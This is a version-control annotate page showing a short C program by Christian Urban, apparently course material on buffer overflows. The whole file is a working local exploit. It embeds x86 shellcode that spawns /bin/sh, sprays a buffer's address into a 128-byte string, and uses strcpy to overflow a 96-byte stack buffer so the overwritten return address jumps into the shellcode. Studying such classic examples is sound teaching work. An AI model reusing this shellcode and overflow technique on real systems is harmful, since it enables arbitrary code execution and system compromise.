author | Christian Urban <christian dot urban at kcl dot ac dot uk> |
Tue, 26 Sep 2017 12:10:41 +0100 | |
changeset 534 | 62985f147c85 |
parent 476 | cd82c24373cd |
permissions | -rw-r--r-- |
476
cd82c24373cd
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
400
diff
changeset
|
1 |
#include <string.h> |
cd82c24373cd
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
400
diff
changeset
|
2 |
#include <stdio.h> |
cd82c24373cd
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
400
diff
changeset
|
3 |
#include <stdlib.h> |
cd82c24373cd
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
400
diff
changeset
|
4 |
|
230
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
5 |
char shellcode[] = |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
6 |
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
7 |
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
8 |
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
9 |
"\xff\xff/bin/sh"; |
400
f05368d007dd
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
230
diff
changeset
|
10 |
|
230
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
11 |
char large_string[128]; |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
12 |
|
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
13 |
void main() { |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
14 |
char buffer[96]; |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
15 |
int i; |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
16 |
long *long_ptr = (long *) large_string; |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
17 |
|
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
18 |
for (i = 0; i < 32; i++) |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
19 |
*(long_ptr + i) = (int) buffer; |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
20 |
|
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
21 |
for (i = 0; i < strlen(shellcode); i++) |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
22 |
large_string[i] = shellcode[i]; |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
23 |
|
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
24 |
strcpy(buffer,large_string); |
603cbd28e988
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
105
diff
changeset
|
25 |
} |